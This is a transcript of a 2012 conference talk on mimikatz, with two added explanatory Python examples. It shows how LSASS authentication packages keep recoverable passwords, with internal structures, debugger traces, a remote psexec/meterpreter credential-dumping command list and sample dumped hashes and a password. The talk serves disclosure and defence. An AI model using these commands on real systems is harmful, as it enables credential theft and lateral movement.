ASFWS 2012 - Mimikatz by Benjamin Delpy
Transcript of ASFWS 2012 - Mimikatz by Benjamin Delpy
mimikatz
Benjamin DELPY `gentilkiwi` – focus on sekurlsa / pass-the-pass and crypto patches
Who? Why?
Benjamin DELPY `gentilkiwi`
– French
– 26y
– Kiwi addict
– Lazy programmer
Started to code mimikatz to:
– explain security concepts
– improve my knowledge
– prove to Microsoft that sometimes they must change old habits
Why all in French?
– because I'm
– It limits script kiddies usage
– Hack with class
07/11/2012 – Benjamin DELPY `gentilkiwi` – ASFWS 2012 – benjamin@gentilkiwi.com / blog.gentilkiwi.com – slide 2
mimikatz :: working?
On XP, 2003, Vista, 2008, Seven, 2008r2, 8, Server 8
– x86 & x64
– 2000 support dropped with mimikatz 1.0
Everywhere, it's statically compiled
Two modes:
– direct action (local commands)
– process or driver communication
mimikatz :: architecture of sekurlsa & crypto
[Figure: three instances of the two modes]
– Direct action: mimikatz.exe → LSASS.EXE hosting KeyIso (« Isolation de clé CNG », i.e. CNG Key Isolation): crypto::patchcng
– Direct action: mimikatz.exe → SVCHOST.EXE hosting EventLog (« Journal d'événements Windows », i.e. Windows Event Log): divers::eventdrop
– Process communication: mimikatz.exe → sekurlsa.dll injected into LSASS.EXE hosting SamSS (« Gestionnaire de comptes de sécurité », i.e. Security Accounts Manager) via VirtualAllocEx / WriteProcessMemory / CreateRemoteThread; the DLL then opens a pipe, writes a welcome message, waits for commands… and returns results
[Figure: module layout]
mimikatz.exe command modules: mod_mimikatz_sekurlsa, mod_mimikatz_nogpo, mod_mimikatz_divers, mod_mimikatz_winmine, mod_mimikatz_impersonate, mod_mimikatz_inject, mod_mimikatz_samdump, mod_mimikatz_standard, mod_mimikatz_crypto, mod_mimikatz_handle, mod_mimikatz_system, mod_mimikatz_service, mod_mimikatz_process, mod_mimikatz_thread, mod_mimikatz_terminalserver, mod_mimikatz_privilege
Internal helper modules: mod_pipe, mod_inject, mod_memory, mod_parseur, mod_patch, mod_hive, mod_secacl, mod_privilege, mod_process, mod_service, mod_system, mod_thread, mod_ts, mod_text, mod_crypto, mod_cryptoapi, mod_cryptoacng
mod_mimikatz_sekurlsa providers: msv_1_0, tspkg, wdigest, livessp, kerberos
Companion binaries: kappfree.dll, kelloworld.dll, klock.dll, mimikatz.sys
sekurlsa.dll (injected into LSASS) providers: sam, secrets, msv_1_0, wdigest, livessp, kerberos, tspkg
mimikatz :: sekurlsa :: what is it?
A module replacement for my previous favorite library
A local module that can read data from the SamSS service (well known LSASS process)
What the sekurlsa module can dump:
– MSV1_0 hashes
– TsPkg passwords
– Wdigest passwords
– LiveSSP passwords
– Kerberos passwords
– …
mimikatz :: sekurlsa :: how LSA works (… level)
[Figure: LSASS and WinLogon; authentication packages msv1_0, tspkg, wdigest, livessp, kerberos; authentication through msv1_0 (against the SAM) or kerberos; challenge / response; user / domain / password; sample domain PLAYSKOOL]
mimikatz :: sekurlsa :: how LSA works (… level)
Authentication packages:
– take user's credentials from the logon
– make their own stuff
– keep enough data in memory to compute responses to challenges (Single Sign On)
If we can get data and inject it in another session of LSASS, we avoid the authentication part
This is the principle of « Pass-the-hash »
– In fact of « Pass-the-x »
mimikatz :: sekurlsa :: history of « pass-the-x » 1/2
Pass-the-hash
– 1997 – Unix modified SAMBA client for hashes usage, Paul Ashton (EIGEN)
– 2000 – Private version of a Windows « LSA Logon Session Editor », Hernan Ochoa (CoreSecurity)
– 2007 – TechEd Microsoft: Marc Murray (TrueSec) presents msvctl and provides some downloads of it
– 2007 – « Pass the hash toolkit » published, Hernan Ochoa (CoreSecurity)
– 2007 – mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself, but in French so not famous ;))
2007 was the year of pass the hash
Pass-the-ticket
– 04/2011 – wce (pass the hash toolkit evolution) provides Kerberos ticket support, Hernan Ochoa (Ampliasecurity)
mimikatz :: sekurlsa :: history of « pass-the-x » 2/2
Pass-the-pass
– 05/2011 – mimikatz 1.0 dumps first clear text passwords from TsPkg provider (but limited to NT 6 and some XP SP3)
  • http://blog.gentilkiwi.com/securite/pass-the-pass
– 05/2011 – return of mimikatz: it dumps clear text passwords from WDigest provider (unlimited this time ;))
  • http://blog.gentilkiwi.com/securite/re-pass-the-pass
– 05/2011 – Some organizations opened cases to Microsoft about it…
…Lots of time…
– begin of 2012 – Lots of blogs (and Kevin Mitnick ;)) say a few words about mimikatz
– 03/2012 – Hernan Ochoa (Ampliasecurity) publishes at seclists that wce supports WDigest password extraction…
  • http://seclists.org/pen-test/2012/Mar/7
– 03/2012 – mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
  • http://blog.gentilkiwi.com/securite/rere-pass-the-pass
– 03/2012 – yeah, once again… more curious, but Kerberos keeps passwords in memory
  • http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
– 08/2012 – sekurlsa module without injection at all (ultra safe)
  • http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition
mimikatz :: sekurlsa :: tspkg
because sometimes hash is not enough…
mimikatz :: sekurlsa :: tspkg :: what is it?
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDesktop users' experience
– http://technet.microsoft.com/library/cc772108.aspx
Relies on CredSSP with Credentials Delegation (= Account delegation)
– Specs: http://download.microsoft.com/download/9/5/E/95EF66AF-9026-4BB0-A41D-A4F81802D92C/%5BMS-CSSP%5D.pdf
First impression: it seems cool
– User does not have to type its password
– Password is not in RDP file
– Password is not in user secrets
mimikatz :: sekurlsa :: tspkg :: questions
KB says that for it to work we must enable « Default credentials » delegation
– "Default credentials: The credentials obtained when the user first logs on to Windows" - https://msdn.microsoft.com/library/bb204773.aspx
  • What? Our User/Domain/Password | Hash | Ticket? It seems…
  – In all cases, system seems to be vulnerable to pass-the-…
In what form? Our specs: [MS-CSSP]
– 2.2.1.2.1 TSPasswordCreds
  • "The TSPasswordCreds structure contains the user's password credentials that are delegated to the server" (or PIN)
    TSPasswordCreds ::= SEQUENCE {
        domainName [0] OCTET STRING,
        userName   [1] OCTET STRING,
        password   [2] OCTET STRING
    }
– Challenge response for authentication?
  • Server: YES (TLS, Kerberos)
  • Client: NO, password is sent to server…
So password resides somewhere in memory
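To make the "password is sent to server" point concrete, here is a small DER encoder/decoder for the TSPasswordCreds structure quoted above. This is an added example, not code from the talk or from mimikatz; it assumes the three fields are carried as UTF-16LE octet strings under explicit context tags [0], [1], [2], which is how CredSSP implementations serialise them (the assumption is noted in the code). The domain, user name and password are constructed sample values. The last function shows the security-relevant fact of the slide: the delegated structure carries the password itself, so only the TLS layer hides it on the wire, and the client side must be able to reproduce it later.

```python
from typing import Dict

TAG_SEQUENCE = 0x30              # universal, constructed
TAG_OCTET_STRING = 0x04
TAG_CONTEXT_CONSTRUCTED = 0xA0   # [n] EXPLICIT context tag is 0xA0 | n


def der_length(n: int) -> bytes:
    """DER definite length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def der_tlv(tag: int, content: bytes) -> bytes:
    return bytes([tag]) + der_length(len(content)) + content


def encode_ts_password_creds(domain: str, user: str, password: str) -> bytes:
    """TSPasswordCreds ::= SEQUENCE { domainName [0], userName [1], password [2] }, all OCTET STRING."""
    fields = []
    for idx, value in enumerate((domain, user, password)):
        # Assumption: strings travel as UTF-16LE, as CredSSP clients encode them.
        octets = der_tlv(TAG_OCTET_STRING, value.encode("utf-16-le"))
        fields.append(der_tlv(TAG_CONTEXT_CONSTRUCTED | idx, octets))
    return der_tlv(TAG_SEQUENCE, b"".join(fields))


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, content, position after the element); rejects truncated input."""
    if pos + 2 > len(buf):
        raise ValueError("truncated header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:
        n = first & 0x7F
        if n == 0 or pos + n > len(buf):
            raise ValueError("bad long-form length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    else:
        length = first
    end = pos + length
    if end > len(buf):
        raise ValueError("truncated content")
    return tag, buf[pos:end], end


def decode_ts_password_creds(blob: bytes) -> Dict[str, str]:
    """Strict parser: exactly one SEQUENCE, fields in order, nothing trailing."""
    tag, body, end = _read_tlv(blob, 0)
    if tag != TAG_SEQUENCE or end != len(blob):
        raise ValueError("not a single SEQUENCE")
    out: Dict[str, str] = {}
    pos = 0
    for idx, name in enumerate(("domainName", "userName", "password")):
        ctag, inner, pos = _read_tlv(body, pos)
        if ctag != (TAG_CONTEXT_CONSTRUCTED | idx):
            raise ValueError(f"expected [{idx}] for {name}")
        itag, value, iend = _read_tlv(inner, 0)
        if itag != TAG_OCTET_STRING or iend != len(inner):
            raise ValueError(f"{name} is not a single OCTET STRING")
        out[name] = value.decode("utf-16-le")
    if pos != len(body):
        raise ValueError("trailing data in SEQUENCE")
    return out


def password_is_in_clear(blob: bytes, password: str) -> bool:
    """No challenge/response on the client side: the password bytes are in the structure."""
    return password.encode("utf-16-le") in blob


if __name__ == "__main__":
    # Constructed sample credentials (PLAYSKOOL is the demo domain of the slides).
    creds = encode_ts_password_creds("PLAYSKOOL", "alice", "S3cret!")
    print(creds.hex())
    print(decode_ts_password_creds(creds))
    print("password visible in structure:", password_is_in_clear(creds, "S3cret!"))
```

The practical consequence for a defender is the one the slide draws: wherever "Default credentials" delegation is allowed, the client must hold the reusable password, not a derived value, so restricting the delegation policy and the set of trusted servers is what limits exposure.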
mimikatz :: sekurlsa :: tspkg :: symbols & theory
Let's explore some symbols
– sounds cool… (thanks Microsoft)
Let's imagine a scenario
– Enumerate all sessions to obtain
  • Username
  • Domain
  • LUID
– Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with LUID to obtain
  • TS_CREDENTIAL
– Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
  • TS_PRIMARY_CREDENTIAL with clear text credentials…

kd> x tspkg!*clear*
75016d1c  tspkg!TSObtainClearCreds = <no type information>
kd> x tspkg!*password*
75011b68  tspkg!TSDuplicatePassword = <no type information>
75011cd4  tspkg!TSHidePassword = <no type information>
750195ee  tspkg!TSRevealPassword = <no type information>
75012fbd  tspkg!TSUpdateCredentialsPassword = <no type information>
kd> x tspkg!*locate*
7501158b  tspkg!TSCredTableLocateDefaultCreds = <no type information>
mimikatz :: sekurlsa :: tspkg :: workflow
[Figure: LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl on tspkg!TSGlobalCredTable → KIWI_TS_CREDENTIAL → pTsPrimary → LsaUnprotectMemory → KIWI_TS_PRIMARY_CREDENTIAL → password in clear]

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
    PVOID unk0;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
    BYTE unk0[108];
#elif defined _M_IX86
    BYTE unk0[64];
#endif
    LUID LocallyUniqueIdentifier;
    PVOID unk1;
    PVOID unk2;
    PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;

mimikatz :: sekurlsa :: tspkg :: demo time
sekurlsa::tspkg
mimikatz :: sekurlsa :: wdigest
because clear text password over http/https is not cool
mimikatz :: sekurlsa :: wdigest :: what is it?
"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network […]" – Wikipedia, http://en.wikipedia.org/wiki/Digest_access_authentication
"Common Digest Authentication Scenarios: – Authenticated client access to a Web site – Authenticated client access using SASL – Authenticated client access with integrity protection to a directory service using LDAP" – Microsoft, http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool
– No password over the network, just hashes
– No reversible password in Active Directory: hashes for each realm
  • Only with Advanced Digest authentication
mimikatz :: sekurlsa :: wdigest :: what is it?
We speak about hashes, but what hashes? H = MD5(HA1:nonce:[…]:HA2)
  • HA1 = MD5(username:realm:password)
  • HA2 = MD5(method:digestURI[:…])
Even after login, HA1 may change… realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers:
– Username
– Realm (from server)
– Password
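The argument of this slide is worth seeing in code: HA1 is bound to the realm, the realm is chosen by whichever server challenges the client, so a client that has only a cached HA1 for one realm cannot answer a challenge from another, while a client that holds the password can answer all of them. The following is an added example, not code from the talk or from mimikatz. It implements the RFC 2617 computation with qop="auth" (the "[…]" of the slide expands to nc:cnonce:qop in that mode), with constructed user, password, realms and nonces; the server side stores only HA1 for its own realm, which is the "no reversible password, hashes for each realm" property the previous slide attributes to Advanced Digest.

```python
import hashlib
import hmac
from typing import Dict, Optional

# Constructed sample values; none of these come from the slides.
USERNAME = "alice"
PASSWORD = "correct horse battery"
REALM_INTRANET = "intranet.example"   # realm the client has already seen
REALM_MAIL = "mail.example"           # realm first seen in a later challenge


def md5_hex(data: str) -> str:
    return hashlib.md5(data.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    # HA1 = MD5(username:realm:password); the realm is supplied by the server
    return md5_hex(f"{username}:{realm}:{password}")


def ha2(method: str, uri: str) -> str:
    # HA2 = MD5(method:digestURI) for qop="auth"
    return md5_hex(f"{method}:{uri}")


def response(h1: str, nonce: str, nc: str, cnonce: str, h2: str) -> str:
    # H = MD5(HA1:nonce:nc:cnonce:qop:HA2)
    return md5_hex(f"{h1}:{nonce}:{nc}:{cnonce}:auth:{h2}")


def answer_with_password(challenge: dict, username: str, password: str,
                         method: str, uri: str, nc: str, cnonce: str) -> str:
    """A provider that keeps the password can answer any realm (what WDigest must do)."""
    h1 = ha1(username, challenge["realm"], password)
    return response(h1, challenge["nonce"], nc, cnonce, ha2(method, uri))


def answer_with_stored_ha1(challenge: dict, ha1_by_realm: Dict[str, str],
                           method: str, uri: str, nc: str, cnonce: str) -> Optional[str]:
    """A provider that keeps only per-realm HA1 values has no answer for an unseen realm."""
    h1 = ha1_by_realm.get(challenge["realm"])
    if h1 is None:
        return None
    return response(h1, challenge["nonce"], nc, cnonce, ha2(method, uri))


def server_verify(stored_ha1: str, challenge: dict, method: str, uri: str,
                  nc: str, cnonce: str, client_response: str) -> bool:
    """Server side: holds HA1 for its own realm only and recomputes H."""
    expected = response(stored_ha1, challenge["nonce"], nc, cnonce, ha2(method, uri))
    return hmac.compare_digest(expected, client_response)


def rfc2617_example() -> str:
    """The published RFC 2617 test vector (user Mufasa), used to check the arithmetic."""
    h1 = ha1("Mufasa", "testrealm@host.com", "Circle Of Life")
    return response(h1, "dcd98b7102dd2f0e8b11d0f600bfb0c093", "00000001",
                    "0a4f113b", ha2("GET", "/dir/index.html"))


def demo() -> dict:
    # Constructed challenges from two servers with different realms.
    chal_intranet = {"realm": REALM_INTRANET, "nonce": "5f1c3e2a9b"}
    chal_mail = {"realm": REALM_MAIL, "nonce": "c0ffee1234"}
    nc, cnonce, method, uri = "00000001", "7d8e9f", "GET", "/inbox"

    # Each server stores HA1 for its own realm only.
    stored = {r: ha1(USERNAME, r, PASSWORD) for r in (REALM_INTRANET, REALM_MAIL)}

    # Client holding the password answers both realms.
    r_int = answer_with_password(chal_intranet, USERNAME, PASSWORD, method, uri, nc, cnonce)
    r_mail = answer_with_password(chal_mail, USERNAME, PASSWORD, method, uri, nc, cnonce)

    # Client that cached HA1 for the intranet realm only cannot answer the mail realm.
    cached = {REALM_INTRANET: stored[REALM_INTRANET]}
    c_int = answer_with_stored_ha1(chal_intranet, cached, method, uri, nc, cnonce)
    c_mail = answer_with_stored_ha1(chal_mail, cached, method, uri, nc, cnonce)

    return {
        "password_client_intranet_ok": server_verify(stored[REALM_INTRANET], chal_intranet, method, uri, nc, cnonce, r_int),
        "password_client_mail_ok": server_verify(stored[REALM_MAIL], chal_mail, method, uri, nc, cnonce, r_mail),
        "ha1_client_intranet_ok": c_int is not None and server_verify(stored[REALM_INTRANET], chal_intranet, method, uri, nc, cnonce, c_int),
        "ha1_client_mail_answer": c_mail,
        "ha1_differs_per_realm": stored[REALM_INTRANET] != stored[REALM_MAIL],
    }


if __name__ == "__main__":
    print(rfc2617_example())
    print(demo())
```

The design choice that matters here is the one Microsoft made on the client: keeping the password (reversibly protected) buys single sign-on to realms that are not known at logon time, at the price of the exposure the rest of the talk demonstrates; a client that only ever talks to a fixed set of realms could hold per-realm HA1 values instead.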
mimikatz :: sekurlsa :: wdigest :: theory
This time we know:
– that WDigest keeps password in memory « by protocol » for HA1 digest
– that LSASS loves to unprotect password with LsaUnprotectMemory (so protect with LsaProtectMemory)
LsaUnprotectMemory
– At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
– Let's perform a search in WDigest
– Hypothesis seems verified
LsaProtectMemory
– At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
– Let's perform a search in WDigest
– SpAcceptCredentials takes clear password in args
  • Protect it with LsaProtectMemory
  • Update or insert data in double linked list wdigest!l_LogSessList

.text:7409D151  _DigestCalcHA1@8         call dword ptr [eax+0B4h]
.text:74096C69  _SpAcceptCredentials@16  call dword ptr [eax+0B0h]
mimikatz :: sekurlsa :: wdigest :: workflow
[Figure: LsaEnumerateLogonSessions → for each LUID → search linked list wdigest!l_LogSessList for LUID → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    […]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
    […]
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;

mimikatz :: sekurlsa :: wdigest :: demo time
sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp :: how?
Actually, I've only used a logical (empirical) approach to search passwords…
– Protocol reading
– Symbols searching
~ Boring ~… be more brutal this time: make a WinDbg trap

0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz :: sekurlsa :: livessp :: how?
Let's login with a Live account on Windows 8
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)

Call stacks caught by the trap (kc 5):
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2            ← Our LiveSSP provider

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials         ← Yeah! Pass the Hash capability with Live account too…

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials          ← Live user can logon through RDP via SSO

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  […]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)
mimikatz :: sekurlsa :: livessp :: workflow
[Figure: LsaEnumerateLogonSessions → for each LUID → search linked list livessp!LiveGlobalLogonSessionList for LUID → KIWI_LIVESSP_LIST_ENTRY → suppCreds → KIWI_LIVESSP_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
mimikatz :: sekurlsa
Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me: yes
mimikatz :: sekurlsa :: kerberos
Let's login with a normal account
After credentials protection, KerbCreateLogonSession calls
– NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
– NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList

Call stacks caught by the trap (kc 5):
lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials       ← Kerberos ticket part? Maybe ;)

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials       ← Kerberos part for password

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
mimikatz :: sekurlsa :: kerberos (nt6) :: workflow
[Figure: LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl on kerberos!KerbGlobalLogonSessionTable → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) :: workflow
[Figure: LsaEnumerateLogonSessions → for each LUID → search linked list kerberos!KerbLogonSessionList for LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    […]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa :: demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos :: "hu?"
Ok. It works…
But why?
Not at all logons on NT5 (can need an unlock)
From my understanding of Microsoft explanations:
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy too)
Microsoft's implementation of Kerberos is full of logical…
– For password auth:
  • password hash for shared secret, but keeping password in memory
– For full smartcard auth:
  • No password on client
  • No hash on client
  – NTLM hash on client…
  – KDC sent it back as a gift
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way so that they can be used
We used LsaUnprotectMemory in the LSASS context to decrypt them
– This function relies on LsaEncryptMemory from lsasrv.dll
For that we previously injected a DLL (sekurlsa.dll) into the LSASS process, to benefit from its keys when we called it
Can it be fun to decrypt outside the process? – Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can use lsasrv.dll too and "imports" the keys LSASS initialized – When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are inside LSASS
Slide 32
LsaUnprotectMemory
mimikatz :: sekurlsa :: LsaEncryptMemory (NT5)
Depending on the size of the secret, LsaEncryptMemory uses:
– RC4
– DESx
Slide 33
[Figure: NT5 key material in lsasrv – g_cbRandomKey (DWORD, 256), g_pRandomKey (BYTE[g_cbRandomKey]), g_pDESXKey (BYTE[144]), g_Feedback (BYTE[8]); mimikatz reads these lsasrv variables out of lsass and copies them into its own lsasrv…]
mimikatz :: sekurlsa :: LsaEncryptMemory (NT6)
Depending on the size of the secret, LsaEncryptMemory uses:
– 3DES
– AES
Slide 34
[Figure: NT6 key material in lsasrv – InitializationVector (BYTE[16]), h3DesKey and hAesKey (BCrypt key handles); mimikatz copies them out of lsass…]
typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE  data;   /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa :: memo
Security Packages
Package          Symbols                                Type
tspkg            tspkg!TSGlobalCredTable                RTL_AVL_TABLE
wdigest          wdigest!l_LogSessList                  LIST_ENTRY
livessp          livessp!LiveGlobalLogonSessionList     LIST_ENTRY
kerberos (nt5)   kerberos!KerbLogonSessionList          LIST_ENTRY
kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable   RTL_AVL_TABLE
msv1_0           lsasrv!LogonSessionList                LIST_ENTRY
                 lsasrv!LogonSessionListCount           ULONG
Protection Keys
Key     NT 5 symbols
RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESx    lsasrv!g_pDESXKey, lsasrv!g_Feedback
Key     NT 6 symbols
        lsasrv!InitializationVector
3DES    lsasrv!h3DesKey
AES     lsasrv!hAesKey
Slide 35
mimikatz :: sekurlsa :: memo
Some commands:
mimikatz privilege::debug sekurlsa::logonPasswords full exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
Slide 36
mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # sekurlsa::logonPasswords full
Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
        msv1_0 :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
         * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
        kerberos :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        wdigest :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        tspkg :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        livessp : nt (LUID KO)
mimikatz :: sekurlsa :: what we can do?
Basics
– No physical access to the computer (first step to pass the hash, then pass the pass)
– No admin rights, system rights, debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts, network logon instead of interactive (when possible)
– Audit: pass the hash keeps traces and can lock accounts
– No admin rights, system rights, debug privileges, even for VIPs
– Use a separated network (or forest) for privileged tasks
More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic:
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
– Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
– Take the opportunities to drop backward compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
Slide 37
